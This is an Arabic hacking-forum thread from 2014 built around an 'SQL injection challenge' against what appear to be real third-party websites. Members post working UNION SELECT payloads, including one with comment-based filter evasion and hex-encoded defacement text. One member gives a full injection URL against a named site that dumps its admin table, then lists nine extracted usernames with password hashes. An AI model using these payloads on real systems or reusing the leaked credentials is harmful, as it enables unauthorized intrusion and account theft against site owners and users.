1. أهلا وسهلاً بكم في :: IQ-TeaM FORUM :: .
    إذا كانت هذه الزيارة الأولى أو لديك الرغبة بالانضمام لأعضاء شبكة عراق تيم فيجب الاطلاع على خصوصية الشبكه فربما بقائك زائر افضل لك من الانضمام بحيث أن قوانين شبكة عراق تيم لا تتناسب مع اهتماماتك .
    • للأطلاع على الخصوصية وسياسة الاستخدام - التفاصيل
    • بعد الاطلاع على سياسة الموقع وقوانين شبكة عراق تيم يمكنك التسجيل معنا - تسجيل عضو جديد
    إستبعاد الملاحظة

New SQL Injection Challenge #3


الموضوع في '[ SQL-injection ]' بواسطة qusaialhaddad, بتاريخ ‏30 أغسطس 2014.

الكاتب : qusaialhaddad | المشاهدات : 378 | الردود : 9
الوسوم:
حالة الموضوع:
مغلق
  1. qusaialhaddad

    qusaialhaddad Developer

    الأنتساب:
    ‏4 أغسطس 2014
    المشاركات:
    68
    الإعجابات المتلقاة:
    5
    نقاط الجائزة:
    8
  2. Egy HacKerS

    Egy HacKerS DeveloPer Plus

    الأنتساب:
    ‏1 ديسمبر 2012
    المشاركات:
    117
    الإعجابات المتلقاة:
    8
    نقاط الجائزة:
    18
    الوظيفة:
    HacKer
    الإقامة:
    Egy
    رد: New SQL Injection Challenge #3

    مبدع يابطل تقبل مروري المتواضع
     
  3. IM MATRIX

    IM MATRIX Developer

    الأنتساب:
    ‏1 ابريل 2012
    المشاركات:
    86
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    8
    رد: New SQL Injection Challenge #3

    Thank you
     
  4. Ghost Libya

    Ghost Libya Developer

    الأنتساب:
    ‏17 ابريل 2014
    المشاركات:
    69
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    نظام التشغيل:
    windows 7
    Facebook:
    رد: New SQL Injection Challenge #3

    جاري الفحص
     
  5. thelasthacker

    thelasthacker <div class="smallfont"><span style="font-weight: b V • I • P

    الأنتساب:
    ‏23 مايو 2014
    المشاركات:
    133
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    18
    اللغة البرمجية:
    Perl
    Facebook:
    رد: New SQL Injection Challenge #3

    these infected is number 1
    exploit this
    Best Price in Sri Lanka /**//*!12345UNION SELECT*//**/ 0x3c666f6e7420636f6c6f723d22726564223e20496e6a656374656420427920546833204c6173744861636b3352203c2f666f6e743e,2,3,4+--+/
     
  6. qusaialhaddad

    qusaialhaddad Developer

    الأنتساب:
    ‏4 أغسطس 2014
    المشاركات:
    68
    الإعجابات المتلقاة:
    5
    نقاط الجائزة:
    8
    رد: New SQL Injection Challenge #3

    The number of columns are wrong
     
  7. thelasthacker

    thelasthacker <div class="smallfont"><span style="font-weight: b V • I • P

    الأنتساب:
    ‏23 مايو 2014
    المشاركات:
    133
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    18
    اللغة البرمجية:
    Perl
    Facebook:
    رد: New SQL Injection Challenge #3

    لكني استخرجت
    user and pass
    كيف ممكنتوضح اخي
     
  8. HaMaM-HaCkEr

    HaMaM-HaCkEr DeveloPer Plus

    الأنتساب:
    ‏22 نوفمبر 2012
    المشاركات:
    117
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    16
    رد: New SQL Injection Challenge #3

    شكرآ ليك اخي :ُeُeF:
     
  9. qusaialhaddad

    qusaialhaddad Developer

    الأنتساب:
    ‏4 أغسطس 2014
    المشاركات:
    68
    الإعجابات المتلقاة:
    5
    نقاط الجائزة:
    8
    رد: New SQL Injection Challenge #3

    It has 2 Columns

    Best Price in Sri Lanka


    you can notice the vulnerable columns near vote and Rating.

    Let me know if you need any explanation.
     
  10. thelasthacker

    thelasthacker <div class="smallfont"><span style="font-weight: b V • I • P

    الأنتساب:
    ‏23 مايو 2014
    المشاركات:
    133
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    18
    اللغة البرمجية:
    Perl
    Facebook:
    رد: New SQL Injection Challenge #3

    look bro my exploit

    http://www.puptaguig.net/eventwithinfo.php?id=122' UNION SELECT (select+group_concat(username,0x3a,password)+from+admin),2+--+/



    the result is

    rendell:1ba455ae9d4db82ef798110809a546f5,
    zimara:9b9780171c0166d4664303ab89b93ac5,
    almi:ec3a1ba69dbed9d849b738b47a7ed0d4,
    nuguid:b170bba2fbda91bc6c57a90e693527a8,
    deluna:4aa94b75f2dae54a83d3546ab4fee00a,
    nursejoy:fd293fecf54deae4f3e79e93ee4d81c2,
    zarco:92608ff4dd8f6d8b60565d8c9a32d52c
    ,pelayo:03a7071f4e287891dc99032dcdb2a759,j
    acinto:0888d5606eb4fbd9a70428a75834e36c​
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة